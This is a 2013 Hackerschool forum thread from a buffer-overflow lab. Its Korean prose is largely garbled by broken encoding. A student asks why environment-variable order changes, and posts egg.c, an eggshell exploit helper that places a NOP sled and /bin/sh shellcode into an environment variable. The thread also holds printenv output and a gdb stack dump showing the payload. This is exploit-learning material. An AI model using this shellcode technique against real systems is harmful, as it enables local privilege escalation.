ý ŷ

 1574, 71/79 ȸ  α  
   bmc12
   egg ȯ 帳ϴ.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1681 []


putenv(egg)
putenv(buff)

̷ ȯ ߰

printenv

EGG ~~~~~
RET ~~~~~

̷ Ʒ ó ; ϴµ

ο printenvϸ 2 ° ó

RET
EGG
̷

ȯ  뿡 ׿

̷ ˷ֽø ϰڽϴ.

1.-----------------------------egg.c system(/bin/sh) -------------------------------------------
(ȯ溯 egg.c ҽ ߰ؼ Դϴ.)

Using address: 0xbffffbd4
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=./e
EGG=1AF1U1E1EIe1A
                    [‹g1agu1OIeyyy/bin/sh
RET=OuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuyOuy


2.----------------------------egg system(/bin/sh)߰ ȯ溯 -------------------------------

[student@BOF student]$ printenv

LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
RET=HnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHnyHny
EGG=1AF1U1E1EIe1A
                    [‹g1agu1OIeyyy/bin/sh
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=5
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv


--------------------------------------egg.c ҽ-------------------------------------------------------------------

int main(int argc, char *argv[])
{
   char *buff, *ptr, *egg;
   long *addr_ptr, addr;
   int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
   int i, eggsize=DEFAULT_EGG_SIZE;
   if (argc > 1) bsize = atoi(argv[1]);
   if (argc > 2) offset = atoi(argv[2]);
   if (argc > 3) eggsize = atoi(argv[3]);
   if (!(buff = malloc(bsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }
   if (!(egg = malloc(eggsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }
//   addr = get_esp() - offset;
   printf("Using address: 0x%x\n", addr);
   ptr = buff;
   addr_ptr = (long *) ptr;
   for (i = 0; i < bsize; i+=4)
     *(addr_ptr++) = addr;
   ptr = egg;
   for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
     *(ptr++) = NOP;
   for(i = 0; i < strlen(shellcode); i++)
     *(ptr++) = shellcode[i];
   buff[bsize - 1] = '\0';
   egg[eggsize - 1] = '\0';
   memcpy(egg,"EGG=",4);
   putenv(egg);
   memcpy(buff,"RET=",4);
   putenv(buff);

// while( *environ)
  //    printf( "%s\n", *environ++);


//   return 0;

   system("/bin/bash");
}






------------------------------------ÿ ȯ ------------------------------------------------

0xbffff2a2:      "i686"
0xbffff2a7:      "/home/student/get"
0xbffff2b9:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffff2db:      "USERNAME="
0xbffff2e5:      "HISTSIZE=1000"
0xbffff2f3:      "HOSTNAME=BOF"
0xbffff300:      "LOGNAME=student"
0xbffff310:      "REMOTEHOST=110.35.139.193"
0xbffff32a:      "MAIL=/var/spool/mail/student"
0xbffff347:      "TERM=xterm"
---Type <return> to continue, or q <return> to quit---
0xbffff352:      "HOSTTYPE=i386"
0xbffff360:      "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin"
0xbffff3a3:      "HOME=/home/student"
0xbffff3b6:      "INPUTRC=/etc/inputrc"
0xbffff3cb:      "SHELL=/bin/bash"
0xbffff3db:      "USER=student"
0xbffff3e8:      "RET=XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"...
0xbffff4b0:      "XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"...
0xbffff578:      "XuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuyXuy"
0xbffff5e8:      "EGG=", '\220' <repeats 196 times>...
0xbffff6b0:      '\220' <repeats 200 times>...
0xbffff778:      '\220' <repeats 200 times>...
0xbffff840:      '\220' <repeats 200 times>...
0xbffff908:      '\220' <repeats 200 times>...
0xbffff9d0:      '\220' <repeats 200 times>...
0xbffffa98:      '\220' <repeats 200 times>...
0xbffffb60:      '\220' <repeats 200 times>...
0xbffffc28:      '\220' <repeats 200 times>...
0xbffffcf0:      '\220' <repeats 200 times>...
0xbffffdb8:      "1AF1U1E1EI\200e\0251A\013[\211\037\213g\0041a\211g\004\211u1OI\200eyyy/bin/sh"
0xbffffde8:      "BASH_ENV=/home/student/.bashrc"
0xbffffe07:      "LANG=en_US"
0xbffffe12:      "OSTYPE=Linux"
0xbffffe1f:      "SHLVL=3"
0xbffffe27:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffeef:      ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb7:      "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffea:      "/home/student/get"
  Hit : 3486     Date : 2013/05/28 09:50


    
bmc12 ߰ ϳ ־ øϴ.

α׷ ÿ Ʒó ȯ溯,argv[],argc,ret ... δٰ ˰ ֽϴ.

׷ٸ

egg.c get_esp()

movl %esp,%eax

κ eaxͿ ٴ̶ Ͻôµ ü ٴ̶ ϴ°ǰ?

ȯ ̱ ϴ ϴ ǰ?

esp Ű κ Ʒ κΰǰ?

0xc0000000
|ȯ溯|
|argv[]|
|argc |
|ret |



 2013/05/28  
bmc12 ׽Ʈ غ

ȯ溯 ϴ ϴ.

export ȯ Ŵ => ǥϿϴ.

ȯ Է Դϴ.

[student@BOF student]$ export C=1
[student@BOF student]$ export B=2
[student@BOF student]$ export A=3
[student@BOF student]$ export AA=4
[student@BOF student]$ export EGG=5


USERNAME=
=>AA=4
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
=>A=3
=>B=2
=>C=1
=>EGG=5
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv
 2013/05/28  
bmc12 Ѵص ذ Ȱ׿..

߰ Է ȴĵ

EGG

RET ٲ ʾƾϴ°ǵ..

......		 2013/05/28  
qkrwncks593 ٴ EBP Ͱ Ű° ٴ̶θ־.
ȯ溯 ġ RET Ʒ ġմϴ.
׸ ESP Ű° Դϴ.
 2013/06/01  
174   ftz ssh [1]     bunggl
 06/30 2479
173   ޴ ݹ ӵ     bumno9173
 12/28 4318
172   Ե Ǯּ~^^[2]     bugbug
 11/02 3181
171   ˽Ʈ [1]     bufferover
 09/14 2845
170   Buffer Overflow Ͽ ...[5]     buff3r
 10/29 4767
169   windows bof սϴ.[2]     buff3r
 08/29 3349
168   ʺε...[3]     bsylove23
 12/06 4709
167   ȳϼ, г αۺα ־ Ÿڰ ư ׿-_-;[6]     bsh4507
 08/25 4129
166   ŷ[2]     bpd
 09/26 3104
165   ̹ ü غ ϴµ... ϳ ϰڽϴ.[4]     boxlug
 01/08 3036
164   ٿ Ͽ ̿~~     boogie2
 07/03 3284
163   shellcode 帳ϴ.[1]     bong93
 01/07 2251
162   BOFԴϴ.[2]     bof
 01/26 3311
161   ^D Ű °???[3]     boanerges
 08/02 3866
160   NT Ʈ ..........     boanerges
 08/02 4173
159   ݹ ġ.........[3]     boanerges
 08/02 4655
158   C,assembly,basic,pascal,batch ......     boanerges
 08/05 4089
157   ȯ ּҸ ̿ BOFݿ Ͽ [2]     bmc12
 05/26 3605
  egg ȯ 帳ϴ.[4]     bmc12
 05/28 3485
155   ; ʹ ;[3]     bluskycomplex
 03/21 3865
[1].. 71 [72][73][74][75][76][77][78][79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org